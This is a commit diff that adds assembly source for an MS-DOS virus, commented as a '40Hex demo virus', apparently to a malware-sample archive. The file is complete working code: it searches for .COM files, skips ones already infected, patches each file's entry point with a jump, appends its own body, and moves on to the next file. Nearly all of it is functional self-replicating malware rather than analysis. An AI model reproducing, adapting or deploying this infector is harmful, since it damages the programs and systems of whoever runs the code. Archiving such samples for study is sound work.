re-organize

push

MSDOS/D-Index/Virus.MSDOS.Unknown.dumb.asm

@@ -0,0 +1,116 @@
+  DumbVirus segment
+  Assume    CS:DumbVirus
+  Org 100h                 ; account for PSP
+  
+  ; Dumb Virus - 40Hex demo virus
+  ; Assemble with TASM /m2
+  
+  Start:  db      0e9h     ; jmp duh
+          dw      0
+  
+  ; This is where the virus starts
+  duh:    call    next
+  next:   pop     bp                   ; bp holds current location
+          sub     bp, offset next      ; calculate net change
+  
+  ; Restore the original first three bytes
+          lea     si, [bp+offset stuff]
+          mov     di, 100h
+  ; Put 100h on the stack for the retn later
+  ; This will allow for the return to the beginning of the file
+          push    di
+          movsw
+          movsb
+  
+  ; Change DTA from default (otherwise Findfirst/next will destroy
+  ; commandline parametres
+          lea     dx, [bp+offset dta]
+          call    set_dta
+  
+          mov     ah, 4eh           ; Find first
+          lea     dx, [bp+masker]   ; search for '*.COM',0
+          xor     cx, cx            ; attribute mask - this is unnecessary
+  tryanother:
+          int     21h
+          jc      quit              ; Quit on error
+  
+  ; Open file for read/write
+  ; Note: This fails on read-only files
+          mov     ax, 3D02h
+          lea     dx, [bp+offset dta+30] ; File name is located in DTA
+          int     21h
+          xchg    ax, bx
+  
+  ; Read in the first three bytes
+          mov     ah, 3fh
+          lea     dx, [bp+stuff]
+          mov     cx, 3
+          int     21h
+  
+  ; Check for previous infection
+          mov     ax, word ptr [bp+dta+26]       ; ax = filesize
+          mov     cx, word ptr [bp+stuff+1]      ; jmp location
+          add     cx, eov - duh + 3              ; convert to filesize
+          cmp     ax, cx                         ; if same, already infected
+          jz      close                          ; so quit out of here
+  
+  ; Calculate the offset of the jmp
+          sub     ax, 3                          ; ax = filesize - 3
+          mov     word ptr [bp+writebuffer], ax
+  
+  ; Go to the beginning of the file
+          xor     al, al
+          call    f_ptr
+  
+  ; Write the three bytes
+          mov     ah, 40h
+          mov     cx, 3
+          lea     dx, [bp+e9]
+          int     21h
+  
+  ; Go to the end of the file
+          mov     al, 2
+          call    f_ptr
+  
+  ; And write the rest of the virus
+          mov     ah, 40h
+          mov     cx, eov - duh
+          lea     dx, [bp+duh]
+          int     21h
+  
+  close:
+          mov     ah, 3eh
+          int     21h
+  
+  ; Try infecting another file
+          mov     ah, 4fh                        ; Find next
+          jmp     short tryanother
+  
+  ; Restore the DTA and return control to the original program
+  quit:   mov     dx, 80h                        ; Restore current DTA to
+                                                 ; the default @ PSP:80h
+  set_dta:
+          mov     ah, 1ah                        ; Set disk transfer address
+          int     21h
+          retn
+  f_ptr:  mov     ah, 42h
+          xor     cx, cx
+          cwd                                    ; equivalent to: xor dx, dx
+          int     21h
+          retn
+  
+  masker  db      '*.com',0
+  ; Original three bytes of the infected file
+  ; Currently holds a INT 20h instruction and a null byte
+  stuff   db      0cdh, 20h, 0
+  e9      db      0e9h
+  eov equ $                                      ; End of the virus
+  ; The following variables are stored in the heap space (the area between
+  ; the stack and the code) and are not part of the virus that is written
+  ; to files.
+  writebuffer dw  ?                              ; Scratch area holding the
+                                                 ; JMP offset
+  dta         db 42 dup (?)
+  DumbVirus    ENDS
+               END     Start
+